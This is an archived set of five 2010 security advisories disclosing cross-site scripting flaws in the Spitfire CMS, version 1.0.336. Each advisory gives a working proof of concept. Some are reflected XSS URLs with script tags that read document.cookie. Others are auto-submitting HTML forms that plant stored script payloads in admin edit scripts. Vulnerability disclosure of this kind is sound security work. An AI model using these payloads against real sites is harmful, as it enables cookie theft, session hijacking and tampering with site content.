Spitfire 1.0.336 Cross Site Scripting

2010-07-23T00:00:00
ID PACKETSTORM:92086
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-07-23T00:00:00

Description

                                        
                                            `============================================================  
Vulnerability ID: HTB22482  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/site/cont_index.php" script to properly sanitize user-supplied input in "cms_id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
http://host/site/cont_index.php?cms_id=PAGE_ID"><script>alert(document.cookie)</script>  
  
============================================================  
Vulnerability ID: HTB22483  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_search.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/site/cont_index.php" script to properly sanitize user-supplied input in "search" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
http://host/site/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>  
  
============================================================  
Vulnerability ID: HTB22484  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_1.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
"tpl_element_settings_action.php" script to properly sanitize user-supplied input in "value[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/cms//edit/tpl_element_settings_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="save" />  
<input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
============================================================  
Vulnerability ID: HTB22485  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_2.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "tpl_backup_action.php" script to properly sanitize user-supplied input in "text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/cms/edit/tpl_backup_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="message" />  
<input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
  
============================================================  
Vulnerability ID: HTB22486  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_3.html  
Product: Spitfire  
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )   
Vulnerable Version: 1.0.336 and Probably Prior Versions  
Vendor Notification: 08 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Low   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "tpl_edit_action.php" script to properly sanitize user-supplied input in "value[headline]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
First code:  
  
<form action="http://host/cms//edit/tpl_edit_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="save" />  
<input type="hidden" name="value[headline]" value='headl2<img src=x onerror=alert(234)>' />  
<input type="hidden" name="winid" value="0" />  
</form>  
<script>  
document.main.submit();  
</script>  
  
Second code:  
  
<form action="http://host/cms//edit/tpl_edit_action.php" method="post" name="main" >  
<input type="hidden" name="action" value="value" />  
<input type="hidden" name="tabid" value="headline" />  
<input type="hidden" name="winid" value="0" />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
`